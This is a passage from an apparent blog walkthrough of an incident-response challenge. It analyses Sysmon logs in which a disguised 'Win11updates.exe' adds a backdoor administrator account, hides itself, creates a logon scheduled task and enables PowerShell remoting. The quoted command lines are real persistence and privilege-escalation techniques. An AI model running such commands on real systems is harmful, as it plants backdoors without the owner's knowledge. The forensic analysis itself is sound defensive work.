</span></b><span><b><span style="color: #fcff01;"> Image C:\Windows\System32\cmd.exe</span></b><span style="color: white;"> </span></span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<span style="color: #fcff01;"><span> CommandLine "C:\Windows\system32\cmd.exe" /c net user LittleNewman password /add </span>
</span><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38e-64bd-9e00-000000003100} </span>
<span style="color: white;"> ParentProcessId 6236 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe </span>
<b><span style="color: #fcff01;"><span> ParentCommandLine powershell -Command "Start-Process -FilePath \"cmd.exe\" -ArgumentList \"/c net user LittleNewman password /add\" -Verb RunAs" </span>
</span></b><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>It also looks like the <i>Win11Updates.exe</i> file is running from "<i>C:\Users\Public\Win11updates.exe</i>". Maybe the file made a copy of itself. Maybe it was intentionally placed there. I have provided no evidence to show how it got there. I do not it is there and that is all that matters to me at this point.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName EXE </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.229 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ProcessId 5512 </span>
<span style="color: white;"> Image E:\Win11updates.exe </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b> TargetFilename C:\Users\Public\Win11updates.exe </b></span>
<span style="color: white;"> CreationUtcTime 2023-07-23 23:11:11.229 </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We next see the attempt to hide the file via the <i>attrib </i>command. This file is being hidden in the "<i>C:/Users/Public/Win11updates.exe</i>". </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.251 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a200-000000003100} </span>
<span style="color: white;"> ProcessId 5832 </span>
<span style="color: white;"> Image C:\Windows\System32\cmd.exe </span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\cmd.exe /c "attrib +h C:/Users/Public/Win11updates.exe" </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>ParentImage E:\Win11updates.exe </b></span>
<span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div>I'm beginning to wonder, if I am concerned about Newman, why are all these tasks so far being done by Jerry's account. Also all of these activity have been done prior to Newman connecting to the system so far. Newman's first connection to port 5985 was at "UtcTime 2023-07-23 23:13:07.856". From the Sysmon logs, <i>Win11Updates.exe </i>did not seem to create any network connections, to allow a remote user to access this system. Is Jerry just as much a cause for concern here as Newman? Hmmmm! Incident response is definitely not easy.</div><div><div><br /></div><div>Once again, the user is being created.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.331 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a400-000000003100} </span>
<span style="color: #fcff01;"> <b>ProcessId 4416 </b></span><b><span style="color: #fcff01;">
<span> Image C:\Windows\System32\net.exe </span></span>
</b><span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Net Command </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName net.exe </span>
<span style="color: #fcff01;"><span> CommandLine net user LittleNewman password /add </span>
</span><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=BB1AE49B6B7C53499E94613761A6AC56,SHA256=AFBE51517092256504F797F6A5ABC02515A09D603E8C046AE31D7D7855568E91,IMPHASH=D45C37A5C97135204AD6E116C34946C3 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38f-64bd-a000-000000003100} </span>
<span style="color: white;"> ParentProcessId 7880 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\cmd.exe </span>
<span style="color: #fcff01;"><span> ParentCommandLine "C:\Windows\system32\cmd.exe" /c net user LittleNewman password /add </span>
</span><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>As expected the "<i>net.exe</i>" command, spawns "<i>net1.exe</i>" to create the user:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.354 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a500-000000003100} </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span>ProcessId 7840 </span>
<span> Image C:\Windows\System32\net1.exe </span></b></span>
<span style="color: white;"> FileVersion 10.0.22621.674 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Net Command </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName net1.exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\net1 user LittleNewman password /add </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=CBF31BACECC4B17A1FE2D65BDC53F111,SHA256=1879DB2ABFF726A5438DD1AE48F20EBED736619C27A32526D09F70AF7EADD0E5,IMPHASH=76EE66A0F294EAB08DCAEF5E64FBF02F </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38f-64bd-a400-000000003100} </span>
<span style="color: white;"> ParentProcessId 4416 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\net.exe </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>ParentCommandLine net user LittleNewman password /add </b></span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We then see "<i>attrib.exe</i>" command is being executed to hide the file </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.370 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a600-000000003100} </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> ProcessId 7860 </span></b></span><b><span style="color: #fcff01;">
<span> Image C:\Windows\System32\attrib.exe </span></span></b>
<span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Attribute Utility </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName ATTRIB.EXE </span>
<b><span style="color: #fcff01;"><span> CommandLine attrib +h C:/Users/Public/Win11updates.exe </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=A243BC9DB0BFB5F22E146B88BB10C58F,SHA256=0758152947F1A550E52CE8E3F9BCD988A23D36A458AD953795769B11C38FF2EA,IMPHASH=2CB38FE7D8F223D9DA50B7CBA9B95A6D </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38f-64bd-a200-000000003100} </span>
<span style="color: white;"> ParentProcessId 5832 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\cmd.exe </span>
<span style="color: #fcff01;"><b><span> ParentCommandLine C:\Windows\system32\cmd.exe /c "attrib +h C:/Users/Public/Win11updates.exe" </span>
</b></span><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div>Like any good threat actor, one or more persistence mechanisms had to be created. We see the backdoor user being created above. Now we see a scheduled task (my favourite persistence mechanism) is being created to run the "<i>Win11updates.exe</i>" file whenever Jerry logs on. While the target of the file is in "<i>C:/Users/Public/Win11updates.exe</i>", we see that the "Jerry" is still working out of the "E:\" drive. I like the choice of name for this scheduled tasks "<i>WindowsImportant</i>".</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.417 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a700-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 7732 </span>
<span> Image C:\Windows\System32\cmd.exe </span></b></span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\cmd.exe /c "schtasks /create /tn "WindowsImportant" /tr "C:/Users/Public/Win11updates.exe" /sc ONLOGON /ru "Jerry"" </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: #fcff01;"><b><span> ParentImage E:\Win11updates.exe </span>
</b></span><span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry</span>
</pre></div>
</div><div><br /></div><div><div>Scheduled tasks is then called as its own process as its parent being cmd.exe.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.511 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a900-000000003100} </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> ProcessId 7988 </span></b></span><b><span style="color: #fcff01;">
<span> Image C:\Windows\System32\schtasks.exe </span></span></b>
<span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Task Scheduler Configuration Tool </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName schtasks.exe </span>
<span style="color: #fcff01;"><span> CommandLine schtasks /create /tn "WindowsImportant" /tr "C:/Users/Public/Win11updates.exe" /sc ONLOGON /ru "Jerry" </span>
</span><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=D857FA7279E2861199583474C17A1C6C,SHA256=DDDE64F0F55751763C1BCD53DE9CDFFC0D725D45A8476464A2A0422661813004,IMPHASH=44E70F20C235C150D75F6FC8B1E29CD1 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38f-64bd-a700-000000003100} </span>
<span style="color: white;"> ParentProcessId 7732 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\cmd.exe </span>
<b><span style="color: #fcff01;"><span> ParentCommandLine C:\Windows\system32\cmd.exe /c "schtasks /create /tn "WindowsImportant" /tr "C:/Users/Public/Win11updates.exe" /sc ONLOGON /ru "Jerry"" </span>
</span></b><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div>I'm beginning to have serious concerns about Jerry. We see that Jerry is attempting to Enable <i>PSRemoting</i>. While <i>PSRemoting </i>is enabled by default on Windows server platforms, the same is not true for client versions. Hence, below, Jerry is deliberately configuring the local computer to receive Powershell remote commands. Ohh Jerry seems up to no good at this point. Or is this Jean preparing the environment for the challenge :-). It doesn't matter, we're just having fun while learning.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.560 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-aa00-000000003100} </span>
<span style="color: white;"> ProcessId 8028 </span>
<span style="color: white;"> Image C:\Windows\System32\cmd.exe </span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<span style="color: #fcff01;"><b><span> CommandLine C:\Windows\system32\cmd.exe /c "powershell.exe Enable-PSRemoting -Force" </span>
</b></span><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: #fcff01;"><b> ParentImage E:\Win11updates.exe </b></span>
<span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We see Powershell is spawned by <i>cmd.exe</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.593 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-ac00-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 7676 </span>
<span> Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe </span></b></span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows PowerShell </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName PowerShell.EXE </span>
<span style="color: white;"> CommandLine powershell.exe Enable-PSRemoting -Force </span>
<span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=0499440C4B0783266183246E384C6657,SHA256=D436E66C0D092508E4B85290815AB375695FA9013C7423A3A27FED4F1ACF90BD,IMPHASH=342A7FD0A3177AE5549A5EEE99F82271 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38f-64bd-aa00-000000003100} </span>
<span style="color: white;"> ParentProcessId 8028 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\cmd.exe </span>
<b><span style="color: #fcff01;"><span> ParentCommandLine C:\Windows\system32\cmd.exe /c "powershell.exe Enable-PSRemoting -Force" </span>
</span></b><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We see the process <i>WmiPRvSE.exe</i> which is associated with WMI Management Instrumentation. I belive this is also used by PSRemoting.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:15.310 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38a-64bd-9800-000000003100} </span>
<span style="color: white;"> ProcessId 3140 </span>
<span style="color: white;"> QueryName JERRY-PC </span>
<span style="color: white;"> QueryStatus 0 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span> QueryResults ::1;::ffff:10.240.240.4; </span>
<span> Image C:\Windows\System32\wbem\WmiPrvSE.exe </span></b></span>
<span style="color: white;"> User NT AUTHORITY\NETWORK SERVICE </span>
</pre></div>
</div><div><br /></div><div><div>We now see the previously created user "<i>LittleNewman</i>" being placed inside of the "<i>administrators</i>" group on the local computer.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:17.201 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b395-64bd-ad00-000000003100} </span>
<span style="color: #fcff01;"><span> ProcessId 6340 </span>
<span> Image C:\Windows\System32\cmd.exe</span></span><span style="color: white;"> </span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\cmd.exe /c "net localgroup Administrators LittleNewman /add" </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: white;"> ParentImage E:\Win11updates.exe </span>
<span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>As expected, <i>net </i>is called via <i>cmd.exe</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:17.236 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b395-64bd-af00-000000003100} </span>
<span style="color: white;"> ProcessId 8144 </span>
<span style="color: #fcff01;"><b><span> Image C:\Windows\System32\net.exe </span>
</b></span><span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Net Command </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName net.exe </span>
<span style="color: #fcff01;"><span> CommandLine net localgroup Administrators LittleNewman /add </span>
</span><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=BB1AE49B6B7C53499E94613761A6AC56,SHA256=AFBE51517092256504F797F6A5ABC02515A09D603E8C046AE31D7D7855568E91,IMPHASH=D45C37A5C97135204AD6E116C34946C3 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b395-64bd-ad00-000000003100} </span>
<span style="color: white;"> ParentProcessId 6340 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\cmd.exe </span>
<b><span style="color: #fcff01;"><span> ParentCommandLine C:\Windows\system32\cmd.exe /c "net localgroup Administrators LittleNewman /add" </span>
</span></b><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>Then <i>net1.exe</i> is spawned by <i>net.exe</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:17.250 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b395-64bd-b000-000000003100} </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> ProcessId 2480 </span></b></span><b><span style="color: #fcff01;">
<span> Image C:\Windows\System32\net1.exe </span></span></b>
<span style="color: white;"> FileVersion 10.0.22621.674 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Net Command </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName net1.exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\net1 localgroup Administrators LittleNewman /add </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=CBF31BACECC4B17A1FE2D65BDC53F111,SHA256=1879DB2ABFF726A5438DD1AE48F20EBED736619C27A32526D09F70AF7EADD0E5,IMPHASH=76EE66A0F294EAB08DCAEF5E64FBF02F </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b395-64bd-af00-000000003100} </span>
<span style="color: white;"> ParentProcessId 8144 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\net.exe </span>
<span style="color: #fcff01;"><b><span> ParentCommandLine net localgroup Administrators LittleNewman /add </span>
</b></span><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>Little Newman is also being added to the "<i>Remote Management Users</i>" group also.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:17.275 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b395-64bd-b100-000000003100} </span>
<span style="color: white;"> ProcessId 2500 </span>
<span style="color: white;"> Image C:\Windows\System32\cmd.exe </span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
